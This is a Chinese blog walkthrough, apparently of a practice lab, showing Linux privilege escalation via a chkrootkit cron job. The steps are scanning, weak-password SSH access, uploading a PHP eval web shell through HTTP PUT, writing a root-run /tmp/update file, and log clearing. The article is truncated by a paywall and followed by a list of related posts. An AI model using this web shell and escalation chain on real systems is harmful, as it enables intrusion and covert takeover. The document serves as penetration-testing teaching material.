linux计划任务提权

原创 已于 2024-06-17 19:29:27 修改 · 972 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

于 2024-06-17 19:18:53 首次发布

目录

(1)信息收集

1)主机发现

arp-scan -l

2)端口扫描

nmap 192.168.1.3

发现开放 ssh 端口尝试暴力破解,成功爆出弱口令

远程登陆,拿到 root 权限,游戏结束 ssh root@192.168.1.3 

3)目录扫描

dirb http://192.168.1.3

(2)漏洞扫描

使用 namp 查看/test 目录支持的方法

nmap --script http-methods --script-args http-methods.url-path='/test'  192.168.1.3

(3)漏洞利用

方法一,向IP地址为192.168.1.4的服务器发送一个OPTIONS请求,获取关于服务器支持的HTTP方法和其他相关信息的响应

curl http://192.168.1.4/test/ -vv -X OPTIONS

curl -v -X PUT -d '' http://192.168.1.4/test/shell.php

方法二:抓包发到重发器,改包使用 PUT 方法写入一句话木马,重发

木马 b.php 写入成功

蚁剑连接

msf 生成后门程序

访问查看

4)网站指纹识别

whatweb http://192.168.1.3

(4)提权

1)三连查看(我是谁,我在哪儿,你是谁)

2)查看版本及内核信息

3)查看 crontab 中包含的文件(定时任务表)

ls -la /etc/cron*

4)查看 chkrootkit 版本,搜索是否存在漏洞

chkrootkit -V

searchsploit chkrootkit 0.49

5)查看提权步骤

find / -name "33899.txt"

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

chkrootkit 会定期以 root 身份执行/tmp/update 文件

6)提权

1./tmp 目录下创建 update 文件并赋予权限

2.向 update 文件中写入将 www-date 添加到 sudo 组的命令

(7)日志清除

(1)信息收集

1)主机发现

arp-scan -l

2)端口扫描

nmap 192.168.1.3

发现开放 ssh 端口尝试暴力破解,成功爆出弱口令

远程登陆,拿到 root 权限,游戏结束 ssh root@192.168.1.3 

-- snip -- 假如不是弱口令游戏继续

3)目录扫描

dirb http://192.168.1.3

(2)漏洞扫描

使用 namp 查看/test 目录支持的方法

nmap --script http-methods --script-args http-methods.url-path='/test'  192.168.1.3

发现支持 PUT 方法,利用 PUT 文件上传

(3)漏洞利用

方法一,向IP地址为192.168.1.4的服务器发送一个OPTIONS请求,获取关于服务器支持的HTTP方法和其他相关信息的响应

curl http://192.168.1.4/test/ -vv -X OPTIONS

curl -v -X PUT -d '<?php eval($_GET["cmd"]);?>' http://192.168.1.4/test/shell.php

最低0.47元/天 解锁文章
『vulnhub系列』dpwwn-1—Linux计划任务
渗透之路,攻防之间皆学问
03-21 2177
如果存在以root限执行的计划任务,且计划任务中存在脚本,并且脚本其他用户拥有写入限则可以通过计划任务
[升] Linux & 维持 — 系统错误配置 - 计划任务
最新发布
Blue17 の 小窝
02-07 1279
靶机 CentOS7:IP 192.168.0.137攻击机 Kali Linux:IP 192.168.0.136。
LINUX计划任务
Jinmindong
01-10 1050
总结一下本文的知识点,讲了计划任务常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机,如果喜欢本文不妨一键三连。
Linux升总结
m0_66458291的博客
04-01 1893
本文总结了Linux的一些检测项目和常见的方式,如suid CVE,脏牛漏洞、脏管道、环境变量、定时任务天、限配置特、MDUT、Rsync、Docker、sudo、policykit
操作系统升(二十)之Linux-计划任务
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1275
先准备一个SUID文件或者限为xx7的文件,让低限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务是因为限配置不当,计划任务以root限运行,低限的用户可以修改计划任务的文件,从而被攻击者利用,导致Linux计划任务命令如下。linux文件第一部分是该文件的拥有者所拥有的限,第二部分是该文件所在用户组的用户所拥有的限,最后一部分是其他用户所拥有的限。
linux计划任务,Linux crontab攻击
weixin_36046580的博客
05-16 2164
crontab定时任务是LINUX上最常用的一个功能,不过使用不当很容易受到。使用crontab时请注意以下两点:crontab任务千万不要写到/etc/crontab文件里,这是很危险的。通过crontab -e去创建,让他写到默认的/var/spool/cron下;能不用 root 去创建尽量不用,如果一定要用root,请保存到一个其他用户进不去、改不了、看不了的位置(最好能用chattr...
linux计划任务,技术分享 | 如何使用Cron Jobs实现Linux
weixin_42393362的博客
05-16 376
写在前面的话今天给各位渗透测试同行们供一种Linux方法,在这篇文章中,我们将介绍如何使用Cron Jobs来实现Linux下的升,并获取远程主机的root访问。Cron Jobs能做什么?Cron Jobs可以在服务器端完成一系列计划任务(设定时间自动执行命令等等),一般它主要用于执行系统管理员任务,例如数据备份或清理缓存目录等等。Cron这个词来源于“crontab”,而这个玩意...
计划任务
一只web狗
06-30 1969
计划任务
Linux 定时任务
大河之犬的博客
06-19 2247
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于操作。由于cron通常以root特运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root限执行任意代码。
Linux第四篇-Linux Cron Jobs(任务计划)(crontab文件覆盖、Crontab Tar Wildcard(通配符)注入
Love&Share
11-19 6446
文章目录Linux Cron Jobscrontab文件覆盖环境搭建Crontab Tar Wildcard(通配符)注入环境准备 Linux Cron Jobs 定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ .
Linux--定时任务--打包配合 SUID(本地)&文件限配置不当(WEB+本地)
金灰的博客
05-12 1133
通过获取计划任务执行文件信息进行 .1、相对路径和绝对路径执行2、计划任务命令存在参数调用利用计划任务的备份功能 tar 命令的参数利用 .(大部分为本地)
linux——大赏
qq_55202378的博客
04-20 1839
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现;时本来就是root限,预先加载共享库shell.so时,也是以root用户的限去加载的。
Linux-03 定时任务crontab
weixin_45626840的博客
01-20 1206
由于文件限配不当,root用户创建的定时任务所调用的脚本或二进制程序可被低限用户读写,可被低限用户利用。这是《升技术-攻防实战与技巧》给出的方法,书中也给出了例子,但笔者在复现的过程却始终不能成功,问了。文件限配置不当,使得低限用户可修改,那么低限用户可以指定root用户身份来执行代码达到目的。文件的每一行都应该包含以下字段,指定何时执行任务和要执行的命令。限不是644 的话,里面的任务是不会执行的。如果懂的师傅,也麻烦评论赐教。有一定的文件限要求,
linux创建定时任务限,利用定时任务(Cronjobs)进行Linux
weixin_30338049的博客
04-30 1458
本文讲解如何利用Linux的Cron Jobs(定时任务)来进行升。cron jobs定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /e...
Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2986
Linux环境变量安全-(aliyun,本地): 前:需要配合SUID进行环境变量且是本地用户环境下进行(因此比较难实现) 过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include<unistd.h> void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
C语言指针使用及动态分配内存
Web安全工具库
10-23 586
看到你的那一瞬间,就像是走了很远的路,我终于到家了,可是我歇一歇,还是得继续走啊。。。 ---- 网易云热评 一、指针 1、二级指针 #include <stdio.h>int main() { int val = 0; int *p_val = &val; //一级指针 int **pp_val = &p_val; //二级指针 **pp_val/*val变量的存储区*/ = 10; printf("val是%d\n", v.
Linux升—定时任务、环境变量、限配置不当、数据库等
剁椒鱼头没剁椒的博客
04-05 2958
在上篇文章中到了Linux升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为到的内容进行补充,至于其它内容可参考上篇文章。Linux升—内核、SUID、脏牛等这里将一下在这个中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它限也GG。如果是WEB限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值